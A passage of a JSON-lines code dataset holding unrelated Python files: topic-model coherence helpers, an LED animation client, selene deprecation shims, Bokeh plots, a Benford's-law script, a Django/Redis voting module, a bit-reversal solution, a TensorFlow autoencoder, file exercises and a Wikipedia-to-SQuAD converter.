‘u_mass’ corpus should be provided\n\n    topn_terms: default of coherence model is 20\n\n    return: a list of coherence scores, one per topic, with the overall model score appended last\n\n    '''\n    coherence_model = models.CoherenceModel(topics = topics, \n                            texts = list_of_lists_tokens, \n                            corpus = corpus,\n                            dictionary = id2word, \n                            coherence = coherence_metric,\n                            topn = topn_terms\n\n                            )\n    model_coherence = coherence_model.get_coherence()\n    topic_coherence = coherence_model.get_coherence_per_topic(segmented_topics=None, with_std=False, with_support=False)\n    topic_coherence.append(model_coherence)\n    return topic_coherence\n    \n\n\n\n\ndef between_topic_distance(model, distance_metric = 'cosine'):\n    topic_term_matrix = model.get_topics()\n    dist_out = 1-pairwise_distances(topic_term_matrix, metric = distance_metric)\n    model_distance = (sum(np.unique(dist_out)) -1)/len(np.unique(dist_out))\n    np.fill_diagonal(dist_out, 0)\n    topic_distance = list(dist_out.max(axis = 0))\n    topic_distance.append(model_distance)\n    return topic_distance\n\n\n\n\n\n\n","sub_path":"topic_modelling_package/.ipynb_checkpoints/TM_functions-checkpoint.py","file_name":"TM_functions-checkpoint.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"627318473","text":"import opc\nimport time\nimport random\n#client = opc.Client('192.168.1.99:7890')\nclient = opc.Client('localhost:7890')\ncolors=[(204,0,204)]\nfps=1\nfill=.25\n\ndef distort(c):\n    mod = [0,0,0]\n    d = random.random() - .5\n    mod[0] = max(c[0] + 123*d,0)\n    d = random.random() - .5\n    mod[1] = max(c[1] + 
123*d,0)\n d = random.random() - .5\n mod[2] = max(c[2] + 123*d,0)\n modtuple = (mod[0],mod[1],mod[2])\n return modtuple\n\ndef color(rgb):\n i = 0\n while i < (13*67):\n d = random.random()\n if d < fill:\n x.append (distort(rgb))\n else:\n x.append((0,0,0))\n i = i +1 \n\ndef colorwave(rgb,j):\n i = 0\n while i < (13*67):\n if j==0:\n x.append((255,0,0))\n else:\n d = random.random()\n if d < fill:\n x.append (distort(rgb))\n else:\n x.append((0,0,0))\n i = i +1 \n if i%13 == 0:\n j = j + 1\n if j > 5:\n j=1\n\ndef colorSwitcher(colors,switch,j):\n colorwave(colors[switch],j)\n\nswitch = 0 \ncount = 0\n\ncap = len(colors)\nj = 0\nwhile True:\n j = j + 1\n x=[]\n count = count + 1\n switch = (switch + 1) % cap\n colorSwitcher(colors,switch, j%13)\n client.put_pixels(x, channel=0)\n time.sleep(1/fps)\n","sub_path":"python_clients/wave.py","file_name":"wave.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"653228587","text":"# MIT License\n#\n# Copyright (c) 2015-2021 Iakiv Kramarenko\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nimport warnings\n\nfrom selene.support.shared import config\n\n\nclass OldConfig:\n @property\n def timeout(self):\n warnings.warn(\n 'selene.config.timeout is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.timeout\n\n @timeout.setter\n def timeout(self, value):\n warnings.warn(\n 'selene.config.timeout is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.timeout = value\n\n @property\n def poll_during_waits(self):\n warnings.warn(\n 'selene.config.poll_during_waits is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.poll_during_waits\n\n @poll_during_waits.setter\n def poll_during_waits(self, value):\n warnings.warn(\n 'selene.config.poll_during_waits is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.poll_during_waits = value\n\n @property\n def base_url(self):\n warnings.warn(\n 'selene.config.base_url is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.base_url\n\n @base_url.setter\n def base_url(self, value):\n warnings.warn(\n 'selene.config.base_url is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.base_url = value\n\n @property\n def app_host(self):\n warnings.warn(\n 'selene.config.app_host is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.base_url\n\n @app_host.setter\n def app_host(self, value):\n warnings.warn(\n 'selene.config.app_host is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.base_url = value\n\n @property\n def cash_elements(self):\n warnings.warn(\n 'selene.config.cash_elements is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.cash_elements\n\n @cash_elements.setter\n def cash_elements(self, value):\n warnings.warn(\n 'selene.config.cash_elements is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.cash_elements = value\n\n @property\n def browser_name(self):\n warnings.warn(\n 'selene.config.browser_name is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.browser_name\n\n @browser_name.setter\n def browser_name(self, value):\n warnings.warn(\n 'selene.config.browser_name is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.browser_name = value\n\n @property\n def start_maximized(self):\n warnings.warn(\n 'selene.config.start_maximized is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.start_maximized\n\n @start_maximized.setter\n def start_maximized(self, value):\n warnings.warn(\n 'selene.config.start_maximized is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.start_maximized = value\n\n @property\n def 
hold_browser_open(self):\n warnings.warn(\n 'selene.config.hold_browser_open is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.hold_browser_open\n\n @hold_browser_open.setter\n def hold_browser_open(self, value):\n warnings.warn(\n 'selene.config.hold_browser_open is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.hold_browser_open = value\n\n @property\n def counter(self):\n warnings.warn(\n 'selene.config.counter is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.counter\n\n @counter.setter\n def counter(self, value):\n warnings.warn(\n 'selene.config.counter is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.counter = value\n\n @property\n def reports_folder(self):\n warnings.warn(\n 'selene.config.reports_folder is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.reports_folder\n\n @reports_folder.setter\n def reports_folder(self, value):\n warnings.warn(\n 'selene.config.reports_folder is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.reports_folder = value\n\n @property\n def desired_capabilities(self):\n warnings.warn(\n 'selene.config.desired_capabilities is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n return config.desired_capabilities\n\n @desired_capabilities.setter\n def desired_capabilities(self, value):\n warnings.warn(\n 'selene.config.desired_capabilities is deprecated, '\n 'use `from selene.support.shared import config` import',\n DeprecationWarning,\n )\n config.desired_capabilities = value\n","sub_path":"selene/support/shared/deprecated.py","file_name":"deprecated.py","file_ext":"py","file_size_in_byte":7361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178259366","text":"from concurrent.futures import ThreadPoolExecutor\n\nfrom bokeh.models import ColumnDataSource, HoverTool\nfrom bokeh.plotting import curdoc, figure\nfrom bokeh.models.widgets import Slider, Toggle\nfrom bokeh.layouts import row, widgetbox\nfrom bokeh.layouts import gridplot\n\n# create basic data\ndoc = curdoc()\nexecutor = ThreadPoolExecutor(max_workers=2)\nsource = ColumnDataSource(data=dict(x=[0], y=[0], color=[\"blue\"]))\n\n# instatiate interactive elements\nnum_points_slider = Slider(title=\"offset\", value=1, start=1, end=10, step=1)\nstep_slider = Slider(title=\"step\", value=5, start=1, end=10, step=1)\nstart_stop = Toggle(label=\"Start/Stop\", button_type=\"default\")\n\n# create inputs column\ninputs = widgetbox(num_points_slider, step_slider, start_stop, width=100)\n\n# decide tools to be used\ntools = \"pan,wheel_zoom,box_zoom,reset,save,crosshair\" # crosshair\nhover = HoverTool(\n tooltips=[\n (\"index\", \"$index\"),\n (\"(x,y)\", \"($x, $y)\")\n ]\n )\n\n# prepare figure\np0 = figure(x_range=[0, 100], y_range=[0, 20], tools=[tools, hover], plot_width=600)\nl0 = p0.circle(x='x', y='y', color='color', source=source)\n\n# add plots\np = gridplot([[p0]], toolbar_location='below') # above, below left right\n\n# add plots to document\ndoc.add_root(row(inputs, 
p))\n","sub_path":"bokeh_interactive_01.py","file_name":"bokeh_interactive_01.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"86286619","text":"import random\n\n# Use chosen method for creating list, finding the first digit and printing the results\n\n\ndef fullSequence(calcMethod, listLength):\n if calcMethod == 1:\n createRandIntList(listLength)\n elif calcMethod == 2:\n createDoubles(listLength)\n elif calcMethod == 3:\n createFibonacci(listLength)\n else:\n createSquaredList(listLength)\n\n findFirstDigit()\n calculateTotals()\n print(\"Total of each beginning digit and their % of total: \")\n printTotals()\n\n# Methods for creating different lists\n\n\ndef createRandIntList(listLength): # List of random integers\n listLength = int(listLength)\n for i in range(listLength):\n r = random.randint(1, listLength)\n li.append(r)\n\n\ndef createDoubles(listLength): # List of constantly doubling numbers\n listLength = int(listLength)\n f1 = 1\n for i in range(listLength):\n li.append(f1)\n f1 = f1 * 2\n\n\ndef createFibonacci(listLength): # Fibonacci sequence\n listLength = int(listLength)\n a, b = 0, 1\n for i in range(listLength):\n a, b = b, a + b\n li.append(a)\n return a\n\n\ndef createSquaredList(listLength): # List of squared numbers (1, 2, 4, 16, 256... n)\n listLength = int(listLength)\n a = 1\n for i in range(listLength):\n li.append(a)\n a = a * a\n if a == 1:\n a = a + 1\n\n# Go through list and remove all digits except for the first in every number in list li\ndef findFirstDigit():\n for i in li:\n while i >= 10:\n i = i / 10\n first_digit_list.append(i)\n\n# Calculate totals of every starting digit\ndef calculateTotals():\n for i in first_digit_list:\n i = int(i)\n final_list[i - 1] = final_list[i - 1] + 1\n\n# Print the total amount of every starting digit\ndef printTotals():\n int = 1\n total = 0\n\n for i in final_list:\n total = i + total\n\n for i in final_list:\n p = float(i * 100.0 / total)\n if i < 10:\n print(int, \": \", i, \" ....\", p, \"%\")\n if i >= 10:\n print(int, \": \", i, \"....\", p, \"%\")\n int += 1\n print(\"==========\\n\")\n\n# Reset lists to get ready for creating and parsing a new list.\ndef resetLists():\n global li\n global first_digit_list\n global final_list\n global listLength\n\n li = []\n first_digit_list = []\n final_list = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n# Create the gui\ndef gui():\n while True:\n resetLists()\n i = input(\"1 : Random String of integers\\n2 : List of doubling numbers\\n3 : Fibonacci Sequence\\n4 : List of squared numbers\\n5 : Exit\\n\\n : \")\n i = int(i)\n if i == 1: # 1 : Random String of integers\n calcMethod = i\n listLength = input(\"\\nHow long do you want the list to be?\\n\\n :\")\n fullSequence(calcMethod, listLength)\n if i == 2: # 2 : List of doubling numbers\n calcMethod = i\n listLength = input(\n \"\\nHow long do you want the list to be? [min: 1 - max: 1028]\\n\\n :\")\n fullSequence(calcMethod, listLength)\n if i == 3: # 3 : Fibonacci Sequence\n calcMethod = i\n listLength = input(\n \"\\nHow long do you want the list to be? [min: 1 - max: 1481]\\n\\n :\")\n fullSequence(calcMethod, listLength)\n if i == 4: # 4 : List of squared numbers\n calcMethod = i\n listLength = input(\n \"\\nHow long do you want the list to be? [min: 1 - max: 12]\\n\\n :\")\n fullSequence(calcMethod, listLength)\n if i == 5: # 5 : Exit\n quit()\n if i not in range(1, 6):\n print(\"\\nInvalid option. Please try again... 
I believe in you\\n\")\n\n\ndef runScript():\n while True:\n gui()\n\n\nif __name__ == '__main__':\n runScript()\n","sub_path":"benfordTest.py","file_name":"benfordTest.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"317610724","text":"from django.contrib.auth.models import User\nfrom webapp.models import LcUser,Comment\nfrom django.db import connection\nfrom time import time\nfrom django.contrib import auth\nimport traceback\nimport os\nimport redis\nfrom django.db.models import F\n\ndef follow_thread(uid,tid):\n try:\n r = redis.Redis()\n r.sadd('uflw:'+str(uid),str(tid))\n r.sadd('tflw:'+str(tid),str(uid))\n return True\n except:\n return False\n\ndef unfollow_thread(uid,tid):\n try:\n r = redis.Redis()\n r.srem('uflw:'+str(uid),str(tid))\n r.srem('tflw:'+str(tid),str(uid))\n return True\n except:\n return False\n\ndef is_following(uid,tid):\n try:\n r = redis.Redis()\n if r.sismember('uflw:'+str(uid),str(tid)):\n return 1\n return 0\n except:\n return 0\n\ndef get_follows(uid):\n try:\n r = redis.Redis()\n tids = r.smembers('uflw:'+str(uid))\n return [int(tid) for tid in tids]\n except:\n return []\n\ndef get_followers(tid):\n try:\n r = redis.Redis()\n uids = r.smembers('tflw:'+str(tid))\n return [int(uid) for uid in uids]\n except:\n return []\n\ndef get_user_id(username):\n try:\n return LcUser.objects.filter(user__username = username)[0].id\n except:\n return -1\n\ndef get_user_name(uid):\n try:\n return LcUser.objects.filter(id = int(uid))[0].user.username\n except:\n return ''\n\ndef notify(uid,cid,reply):\n \"\"\"\n notify user about a reply to his-her comment from another user\n \"\"\"\n try:\n r = redis.Redis()\n if reply:\n r.zadd('not:'+str(uid),str(cid),int(time()))\n else:\n r.zadd('not:'+str(uid),str(cid),0)\n except:\n return None # fail silent - not a big deal\n\ndef get_notifs(uid):\n try:\n r = redis.Redis()\n notifs = r.zrange('not:'+str(uid),0,-1,withscores=True)\n return notifs\n except:\n return []\n\ndef del_notif(uid,cid):\n try:\n r = redis.Redis()\n r.zrem('not:'+str(uid),str(cid))\n except:\n return None\n\ndef did_vote(uid,cids):\n \"\"\"\n returns -1,0,1 for downvote,notvoted,upvote for given u(ser)id and c(omment)ids\n \"\"\"\n try:\n r = redis.Redis()\n votes = r.hmget('v:'+str(uid),[str(cid) for cid in cids])\n out = []\n for vote in votes:\n if vote == None:\n out.append(0)\n else:\n out.append(int(vote))\n return (True,out)\n except:\n return (False,str(traceback.format_exc()))\n \ndef vote(uid,cid,vote):\n \"\"\"\n add user vote (! 
changes both redis and postgres !)\n \"\"\"\n try:\n r = redis.Redis()\n v = r.hget('v:'+str(uid),str(cid))\n if v == None:\n v = 0\n else:\n v = int(v)\n if v == vote:\n return (True,'') # no need to change - same vote - should never be possible\n r.hset('v:'+str(uid),str(cid),vote)\n \n c = Comment.objects.get(pk = int(cid))\n t = c.thread\n \n if c.creator.id != int(uid):\n\n if v == 1:\n c.up = c.up - 1\n t.up = t.up - 1\n elif v == -1:\n c.down = c.down - 1\n t.down = t.down - 1\n if vote == 1:\n c.up = c.up + 1\n t.up = t.up + 1\n elif vote == -1:\n c.down = c.down +1\n t.down = t.down +1\n\n c.save()\n t.save()\n\n return (True,'')\n except:\n connection._rollback()\n return (False,str(traceback.format_exc()))\n\ndef login(request,username,password):\n try:\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user);\n # bring up associated lc-user object\n lcuser = LcUser.objects.get(user = user)\n request.session['uid'] = lcuser.id\n return (True,'')\n return (False,'')\n except:\n connection._rollback()\n return (False,str(traceback.format_exc()))\n\ndef generateId():\n return int(os.urandom(4).encode('hex'),16) / 2\n\ndef register(request,username,password,email=None):\n try:\n user = User.objects.create_user(username = username, password = password, email = email)\n user.is_staff = False\n user.save()\n # create a blank lc user and associate with user object\n lcuser = LcUser(id=generateId(),user = user, time_joined = int(time()), join_ip = request.META['REMOTE_ADDR'])\n lcuser.save()\n user = auth.authenticate(username=username, password=password)\n auth.login(request, user);\n request.session['uid'] = lcuser.id\n return (True,lcuser.id)\n except:\n connection._rollback()\n return (False,str(traceback.format_exc()))\n\ndef logout(request):\n try:\n auth.logout(request)\n return (True,'')\n except:\n return (False,str(traceback.format_exc()))\n\ndef get_commented_threads(uid):\n try:\n creator = LcUser.objects.get(pk = int(uid))\n user_comments = creator.comment_set.all().order_by('-time_created')\n user_threads = []\n for c in user_comments:\n tid = c.thread.id\n user_threads = user_threads + [[tid,[c.id]]]\n # Eliminate duplicates from the thread ids\n # Merge comment IDs during the elimination \n if user_threads:\n user_threads.sort(key=lambda l: l[0])\n last = user_threads[-1]\n for i in range(len(user_threads)-2, -1, -1):\n if last[0] == user_threads[i][0]:\n last[1] = last[1] + user_threads[i][1]\n del user_threads[i]\n else:\n last = user_threads[i]\n return (True, user_threads)\n except:\n return (False,str(traceback.format_exc()),'')\n","sub_path":"lc/webapp/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"81457745","text":"#coding=utf-8\n\nimport unittest\n\n\"\"\"\n\n190. 
Reverse Bits\nReverse bits of a given 32 bits unsigned integer.\n\nFor example, given input 43261596 (represented in binary as 00000010100101000001111010011100), return 964176192 \n(represented in binary as 00111001011110000010100101000000).\n\nFollow up:\nIf this function is called many times, how would you optimize it?\n\nRelated problem: Reverse Integer\n\nCredits:\nSpecial thanks to @ts for adding this problem and creating all test cases.\n\n\nDifficulty:Easy\nTotal Accepted:113.6K\nTotal Submissions:385K\nContributor: LeetCode\n\nRelated Topics \nBit Manipulation \nSimilar Questions \nNumber of 1 Bits \n\n\"\"\"\n\n\n\nclass Solution:\n    # @param n, an integer\n    # @return an integer\n    def reverseBits(self, n):\n        ans = 0\n        for i in range(32):\n            ans <<= 1\n            ans |= n & 1\n            n >>= 1\n        return ans\n\n    def reverseBits2(self, n): # from ref, actually no need to worry about -, it says unsigned integer\n        \"\"\"\n        s = bin(3), '0b11'\n        s = bin(-3), '-0b11'\n        a = \"3\".zfill(8), '00000003'\n        a = \"0101\".zfill(8), '00000101'\n        actually no need to worry about -, it says unsigned integer, following AC\n        \n        def reverseBits(self, n):\n            string = bin(n)\n            string = string[:2] + string[2:].zfill(32)[::-1]\n            return int(string, 2)\n        \n        :param n: \n        :return: \n        \"\"\"\n        string = bin(n)\n        if '-' in string:\n            string = string[:3] + string[3:].zfill(32)[::-1]\n        else:\n            string = string[:2] + string[2:].zfill(32)[::-1]\n        return int(string, 2)\n\n    def reverseBits_ref(self, n):\n        oribin = '{0:032b}'.format(n)\n        reversebin = oribin[::-1]\n        return int(reversebin, 2)\n\n\nclass SolutionTester(unittest.TestCase):\n    def setUp(self):\n        self.sol = Solution()\n\n    def test_case1(self):\n        nums = 43261596\n        answer = 964176192\n        result = self.sol.reverseBits(nums)\n        self.assertEqual(answer, result)\n\n\ndef main():\n    suite = unittest.TestLoader().loadTestsFromTestCase(SolutionTester)\n    unittest.TextTestRunner(verbosity=2).run(suite)\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n\n#-*- coding:utf-8 -*-\n\n\"\"\"\nPython code (naive solution):\nclass Solution:\n    # @param n, an integer\n    # @return an integer\n    def reverseBits(self, n):\n        ans = 0\n        for i in range(32):\n            ans <<= 1\n            ans |= n & 1\n            n >>= 1\n        return ans\n\nOptimization:\nReference: https://oj.leetcode.com/discuss/27338/8ms-c-code-some-ideas-about-optimization-spoiler\n\nReverse the word 4 bits at a time: precompute the reversed value of every nibble 0x0 through 0xF in a 16-entry lookup table, then simply look the results up during the reversal.\n\nC code:\nchar tb[16] = {0,8,4,12,2,10,6,14,1,9,5,13,3,11,7,15};\n\nuint32_t reverseBits(uint32_t n) {\n    int curr = 0;\n    uint32_t ret = 0;\n    uint32_t msk = 0xF;\n    for(int i = 0; i < 8; i++) {\n        ret = ret << 4;\n        curr = msk&n;\n        ret |= tb[curr];\n        n = n >> 4;\n    }\n    return ret;\n}\n\n\n\n\"\"\"","sub_path":"freq/reverse_bits.py","file_name":"reverse_bits.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"464027632","text":"import random\nfrom dino_runner.utils.constants import (\n    SCREEN_WIDTH,\n    CLOUD\n)\nfrom pygame.sprite import Sprite\n\n\nclass Cloud(Sprite):\n\n    def __init__(self):\n        self.x = SCREEN_WIDTH + random.randint(800, 1000)\n        self.y = random.randint(50, 100)\n        self.image = CLOUD\n        self.width = self.image.get_width()\n\n    def update(self, game_speed):\n        self.x -= game_speed\n        if self.x < -self.width:\n            self.x = SCREEN_WIDTH + random.randint(2500, 3000)\n            self.y = random.randint(50, 100)\n\n    def draw(self, screen):\n        screen.blit(self.image, (self.x, 
self.y))\n\n","sub_path":"dino_runner/components/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"515305337","text":"# -*- coding:utf-8\n#!/usr/bin/env python\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\n\n#from BatchNormalization import BatchNormalization\n\nfrom IPython import embed\n\nclass Autoencoder:\n def __init__(self, ch_list=[3,32,32,16,8], k_h=5, k_w=5, stddev=0.01):\n self.ch_list = ch_list\n #define learnable parameter\n with tf.variable_scope(\"ae\"):\n #encoder\n self.w_enc1 = tf.Variable(tf.truncated_normal([28 * 28, self.ch_list[1]], stddev=stddev))\n self.b_enc1 = tf.Variable(tf.zeros([self.ch_list[1]]))\n self.w_enc2 = tf.Variable(tf.truncated_normal([self.ch_list[1], self.ch_list[2]], stddev=stddev))\n self.b_enc2 = tf.Variable(tf.zeros([self.ch_list[2]]))\n \n #decoder\n self.w_dec2 = tf.Variable(tf.truncated_normal([self.ch_list[2], self.ch_list[1]],stddev=stddev))\n self.b_dec2 = tf.Variable(tf.zeros([self.ch_list[1]]))\n self.w_dec1 = tf.Variable(tf.truncated_normal([self.ch_list[1], 28 * 28], stddev=stddev))\n self.b_dec1 = tf.Variable(tf.zeros([28 * 28]))\n\n def __call__(self, x, batch_size, train=True):\n \n #Full connection1(300)\n h_conv4 = tf.reshape(x, [-1, 1 * 28 * 28])\n inter_enc1 = tf.matmul(h_conv4, self.w_enc1) + self.b_enc1\n h_enc1 = tf.nn.tanh(inter_enc1)\n\n #Full connection2(20)\n inter_enc2 = tf.matmul(h_enc1, self.w_enc2) + self.b_enc2\n h_enc2 = tf.nn.tanh(inter_enc2)\n\n #Full connection3(300)\n inter_dec2 = tf.matmul(h_enc2, self.w_dec2) + self.b_dec2\n h_dec2 = tf.nn.tanh(inter_dec2)\n \n #Full connection4(784)\n inter_dec1 = tf.matmul(h_dec2, self.w_dec1) + self.b_dec1\n h_dec1 = tf.nn.tanh(inter_dec1)\n h_dec1 = tf.reshape(h_dec1, [-1, 28, 28, 1])\n \n return h_dec1\n \ndef conv2d(x, weight, batch_norm=None, train=True, activation=tf.nn.tanh):\n h_conv = tf.nn.conv2d(x, weight, strides=[1,2,2,1], padding=\"SAME\")\n if batch_norm != None:\n h_conv = batch_norm(h_conv, train=train)\n h_conv = activation(h_conv)\n return h_conv\n\ndef deconv2d(x, weight, output_shape, batch_norm=None, train=True, activation=tf.nn.tanh):\n h_deconv = tf.nn.conv2d_transpose(x, weight, output_shape=output_shape, strides=[1, 2, 2, 1], padding=\"SAME\")\n if batch_norm != None:\n h_deconv = batch_norm(h_deconv, train=train)\n h_deconv = activation(h_deconv)\n return h_deconv\n\n\n \n","sub_path":"vae_origin/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"189295043","text":"#Q1:-\r\nfile=open(\"myfile.txt\",\"r\")\r\nprint(file)\r\nfor line in reversed(list(open(\"myfile.txt\"))):\r\n print(line.rstrip())\r\nprint(file.readlines())\r\nn=int(input(\"enter lines to be read:- \"))\r\nfile=open('myfile.txt')\r\nlines=file.readlines()\r\nprint(lines[0:n-1])\r\n\r\n\r\n#Q2:-\r\nimport re\r\nimport string\r\n\r\nfrequency = {}\r\ndocument_text = open('myfile.txt', 'r')\r\ntext_string = document_text.read().lower()\r\nmatch_pattern = re.findall(r'\\b[a-z]{3,15}\\b', text_string)\r\n\r\nfor word in match_pattern:\r\n count = frequency.get(word, 0)\r\n frequency[word] = count + 1\r\n\r\nfrequency_list = frequency.keys()\r\n\r\nfor words in frequency_list:\r\n print(words, frequency[words])\r\n\r\n\r\n#Q3:-\r\nwith open(\"file1.txt\",\"w\") as f:\r\n with open(\"file2.txt\", 
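# File-handling exercises Q1-Q5; assumes the input files used below (myfile.txt, file2.txt, abc.txt, def.txt) already exist in the working directory.\r\n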
\"r\") as f1:\r\n for line in f1:\r\n f.write(line)\r\n\r\n\r\n#Q4:-\r\nwith open('abc.txt','r') as fh1, open('def.txt','r') as fh2:\r\n for line1,line2 in zip(fh1,fh2):\r\n line1=line1[:3]\r\n line2=line2[:3]\r\n file3 = open(\"ghi.txt\", \"a\")\r\n file3.write(line1+line2+\"\\n\")\r\n file3.close()\r\n file4 = open(\"ghi.txt\", \"r\")\r\n print(file4.readlines())\r\n file4.close()\r\n\r\n\r\n#Q5:-\r\nimport random\r\nl=[]\r\nwith open(\"randomno1.txt.py\",\"a+\",encoding=\"utf-8\") as gh1, open(\"randomno2.txt.py\",\"a+\",encoding=\"utf8\") as gh2:\r\n for i in range(0,9):\r\n l.append(random.randint(0,9))\r\n for i in l:\r\n gh1.writelines(str(i))\r\n l.sort()\r\n print(l)\r\n for k in l:\r\n gh2.write(str(l)+\"\\n\")\r\n print(gh2.read)\r\n","sub_path":"Assignment14.py","file_name":"Assignment14.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"322124355","text":"#!/usr/bin/env python3\n# Copyright 2019, Nihon Unisys, Ltd.\n#\n# This source code is licensed under the BSD license.\n\nimport argparse\nimport json\nimport util\nimport re\nfrom pathlib import Path\n\nstart_pattern = re.compile(r'^\\s+\\s*')\nend_pattern = re.compile(r'^.*
    .*')\nhtmltag_pattern = re.compile(r'<!--|-->|<[^>]+?>')\nexcept_nextline_pattern = re.compile(r'^[^\n]*')\n\ndef replace_html_tag(html_data):\n    is_content = False\n    is_comment = False\n    in_table_tag = False\n    content = []\n    for line in html_data.split('\n'):\n        raw_line = line  # keep the unmodified line, since comment markers are blanked out of line below\n        if not is_content and start_pattern.match(line):\n            is_content = True\n        if is_content and end_pattern.match(line):\n            break\n        if is_content and not is_comment and line.startswith('<!--') and not '-->' in line:\n            is_comment = True\n\n        if not is_content or is_comment:\n            iterator = except_nextline_pattern.finditer(line)\n            line = list(line)\n            for match in iterator:\n                line[match.start():match.end()] = [' ']*(match.end()-match.start())\n            content.append(''.join(line)+'\n')\n        else:\n            iterator = htmltag_pattern.finditer(line)\n            line = list(line)\n            for match in iterator:\n                line[match.start():match.end()] = [' ']*(match.end()-match.start())\n            content.append(''.join(line)+'\n')\n\n        if '-->' in raw_line:\n            is_comment = False\n\n    return ''.join(content)\n\ndef process(dataset, filedir, multiple_answer=False, addtitle=True):\n\n    data_size = len(dataset['entry'])\n    squad_data = []\n\n    for i, entry in enumerate(dataset['entry']):\n\n        ENE = entry['ENE']\n        title = entry['title']\n        page_id = entry['page_id']\n        attributes = entry['Attributes_html']\n\n        print('-'*5, str(i) + '/' + str(data_size), str(page_id), title, '-'*5)\n\n        with filedir.joinpath(str(page_id)+'.html').open() as f:\n            html_content = f.read()\n\n        content = replace_html_tag(html_content)\n\n        if not multiple_answer:\n            content = 'φ'+content[1:]\n\n        q_idx = 0\n        qas = []\n\n        for k,v in attributes.items():\n            if addtitle:\n                q = title + 'の' + k + 'は?'\n            else:\n                q = k\n            q_idx += 1\n            q_id = str(page_id) + '_' + str(q_idx)\n            answers = []\n            found_answers = set()\n            for ans in v:\n                answers.append({\"answer_start\": ans['start'], \"answer_end\": ans['end'], \"text\": ans['text']})\n\n            if not multiple_answer and len(answers) == 0:\n                answers.append({\"answer_start\": 0, \"text\": 'φ'})\n            qas.append({\"answers\": answers, \"question\": q, \"id\": q_id})\n\n        squad_json = {\"title\": title, 'WikipediaID': page_id, \"ENE\":ENE, \"paragraphs\": [{\"context\": content, \"qas\": qas}]}\n        squad_data.append(squad_json)\n    return squad_data\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.register('type', 'bool', util.str2bool)\n    parser.add_argument('input', type=str)\n    parser.add_argument('output', type=str)\n    parser.add_argument('--category', type=str, default='',\n                        help='category name')\n    parser.add_argument('--html_dir', type=str, default='./data/JP-5/HTML/',\n                        help='HTML data directory path')\n    parser.add_argument('--multiple-answer', action='store_true',\n                        help='convert for multiple answers model')\n    